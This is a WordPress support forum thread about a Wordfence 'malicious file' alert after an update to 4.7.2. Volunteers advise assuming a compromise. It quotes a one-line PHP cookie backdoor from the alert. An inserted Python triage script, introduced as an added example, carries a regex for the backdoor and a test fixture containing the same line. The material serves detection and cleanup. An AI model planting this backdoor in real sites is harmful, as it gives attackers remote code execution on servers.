Malicious File After Updating WordPress to 4.7.2

  • +ES

    (@evelynmsdesigngraphicscom)


    Hello+

    I have updated 6 WordPress sites to 4.7.2 and afterwards I have received the following notice from all of them:

    File appears to be malicious: wp-content/common.php

    I do have WordFence and BlogVault Security on all of these and both platforms are informing me of this issue.

    I find it odd that all sites have this warning after the newest WordPress update. Is anyone else getting this alert?

    I am going through each and fixing them, however I’m wondering if this is a false alarm or what?

    Any advice/guidance about this specific suspicious malicious file and how/why it appeared after updating to WordPress 4.7.2 on ALL sites would be greatly appreciated. Also, are there any additional things I need to do…?

    Thank you.

Viewing 11 replies - 1 through 11 (of 11 total)
  • barnez

    (@pidengmor)

    That file is not a part of the WordPress install or upgrade package. I would assume the worst – that the file is malicious and that your hosting account/personal machine/login credentials have been compromised. This is the standard support doc referred to in this case: https://codex.wordpress.org/FAQ_My_site_was_hacked . Then once your site is clean: http://codex.wordpress.org/Hardening_WordPress

    Moderator Steve Stern

    (@sterndata)

    Support Team Volunteer

    If you look at the file, is there any indication where it might come from? Any comments at the top?

    If all your sites are in the same hosting account, a hack of one could easily affect the others.

    +ES

    (@evelynmsdesigngraphicscom)

    Hello+

    @pidengmor (barnez), thank you for clarifying that it really is a malicious file. I do not think “my” hosting account/personal machine/login credentials have been compromised since none of these are on my hosting. All of these are my clients’ websites and each has their own individual accounts, with which ever host provider they prefer. They are not all hosted by the same hosting company. However, ALL got this malicious file AFTER the update to WordPress 4.7.2.

    @sterndata, thank you for that suggestion… There is no indication as to where it might have come from (looking via WordFence), only “This file appears to be installed by a hacker to perform malicious activity”… Also, no – they are NOT on the same hosting account.

    I am removing that file now…I simply find it VERY suspicious that I updated to the WordPress 4.7.2 and THEN ALL were hacked… I’m just wondering about that…?

    Thanks, +ES

    barnez

    (@pidengmor)

    @evelynmsdesigngraphicscom

    As suggested by @sterndata, it would be interesting to see what the file contains. It could be something as innocent as a plugin adding the file. Wordfence may just be flagging it as malicious as it shouldn’t be there. If it has lots of obfuscated code or dodgy links then it’s trouble. Are you able to check?

    +ES

    (@evelynmsdesigngraphicscom)

    Hello+

    I will take a look and see… I will post what I find.

    Thank you.

    +ES

    (@evelynmsdesigngraphicscom)

    Hi+

    Looking at WordFence, the alert says:

    File appears to be malicious: wp-comments-post.php

    Filename: wp-comments-post.php
    File type: Core
    Issue first detected: 4 hours 32 mins ago.
    Severity: Critical
    Status New

    This file appears to be installed by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: “if (isset($_COOKIE[“id”])) @$_COOKIE[“user”]($_COOKIE[“id”]);”. The infection type is: Backdoor:PHP/ddksk7.
    However when I go to “see how the file has changed”, it says:

    There are no differences between the original file and the file in the repository.

    So…should I “restore the original version”? Or delete it entirely? (since it is not part of the WordPress install or upgrade package)

    Thank you! +ES

    Moderator Steve Stern

    (@sterndata)

    Support Team Volunteer

    Delete it.

    Remain calm and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are two.

    +ES

    (@evelynmsdesigngraphicscom)

    Thank you Steve… I already have WordFence and BlogVault Security on the sites.

    I am in via FTP and looking under “wp-content”, which is where WordFence is stating the common.php is located:

    wp-content/common.php

    But I do not see that common.php – so it is difficult to delete if I don’t see it via FTP… Any suggestions?

    Thanks!

    +ES

    (@evelynmsdesigngraphicscom)

    Okay, that was not supposed to be a link… just the letters “FTP”
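The two findings discussed in this thread, the backdoor text Wordfence quoted (a cookie value called as a function with another cookie value as its argument) and a PHP file sitting directly under wp-content/ where the core package puts none except index.php, can both be checked from a shell or SSH session rather than through FTP. The script below is an added example written for this thread; it is not part of Wordfence, BlogVault or WordPress, and it builds its own throwaway site tree (the file contents are constructed, not real WordPress files) so it runs offline. The `DYNAMIC_CALL` pattern, the function names and the temporary directory layout are this example's own assumptions.

```python
"""Defender-side triage for the Wordfence alert discussed in this thread (added example)."""
import hashlib
import os
import re
import tempfile
from pathlib import Path

# Signature derived from the text Wordfence quoted above:
#   if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);
# The idiom is "a request-controlled value used as a function name, called with
# another request-controlled value". Legitimate plugin or theme code has no
# reason to do this, so a match is worth a manual look.
DYNAMIC_CALL = re.compile(
    r'\$_(?:COOKIE|GET|POST|REQUEST)\s*\[[^\]]*\]\s*\(\s*\$_(?:COOKIE|GET|POST|REQUEST)\s*\['
)

# Constructed sample file contents (assumption: shaped like, but not copied from, real files).
CLEAN_INDEX = "<?php\n// Silence is golden.\n"
CLEAN_COMMENTS_POST = "<?php\n/** Handles a comment post. */\nrequire( dirname(__FILE__) . '/wp-load.php' );\n"
DROPPED_FILE = '<?php\nif (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);\n'


def build_constructed_site():
    """Create a throwaway tree mirroring the reporter's layout: a clean core file,
    a clean wp-content/index.php and an unexpected wp-content/common.php."""
    root = Path(tempfile.mkdtemp(prefix="wp-triage-"))
    (root / "wp-content").mkdir()
    (root / "wp-content" / "index.php").write_text(CLEAN_INDEX)
    (root / "wp-content" / "common.php").write_text(DROPPED_FILE)
    (root / "wp-comments-post.php").write_text(CLEAN_COMMENTS_POST)
    return root


def scan_file_for_backdoor(path):
    """Return the matching snippet if the file contains the dynamic-call idiom, else None."""
    try:
        text = Path(path).read_text(errors="replace")
    except OSError:
        return None
    match = DYNAMIC_CALL.search(text)
    return match.group(0) if match else None


def scan_tree_for_backdoor(root):
    """Walk every .php file under root and collect (relative path, snippet) hits."""
    root = Path(root)
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = Path(dirpath) / name
            snippet = scan_file_for_backdoor(path)
            if snippet:
                hits.append((path.relative_to(root).as_posix(), snippet))
    return sorted(hits)


def unexpected_wp_content_php(root):
    """PHP files directly inside wp-content/. Core ships only index.php there,
    so anything else was put there by a plugin, a person or an attacker."""
    wp_content = Path(root) / "wp-content"
    if not wp_content.is_dir():
        return []
    return sorted(p.name for p in wp_content.iterdir()
                  if p.is_file() and p.suffix == ".php" and p.name != "index.php")


def sha256_of(path):
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()


def core_file_matches_reference(path, reference_sha256):
    """True when the on-disk core file is byte-identical to a known-good copy of
    the same WordPress version. An intact hash plus a hit elsewhere is the
    'no differences' outcome the reporter saw for wp-comments-post.php."""
    return sha256_of(path) == reference_sha256


if __name__ == "__main__":
    site = build_constructed_site()
    for rel, snippet in scan_tree_for_backdoor(site):
        print(f"backdoor idiom in {rel}: {snippet}")
    print("unexpected PHP directly under wp-content/:", unexpected_wp_content_php(site))
    reference = hashlib.sha256(CLEAN_COMMENTS_POST.encode()).hexdigest()
    print("wp-comments-post.php intact:",
          core_file_matches_reference(site / "wp-comments-post.php", reference))
```

Run it against a real document root by calling `scan_tree_for_backdoor("/path/to/site")` and `unexpected_wp_content_php("/path/to/site")` instead of the constructed tree; reference hashes for core files come from a clean download of the same WordPress version. Because `os.walk` lists every entry regardless of permissions or leading dots, it also surfaces a file that a restricted FTP view does not show.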

    Moderator Steve Stern

    (@sterndata)

    Support Team Volunteer

    If you have a suspicious file, it’s best to assume there are more.

    Remain calm and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are two.

    +ES

    (@evelynmsdesigngraphicscom)

    Thank you
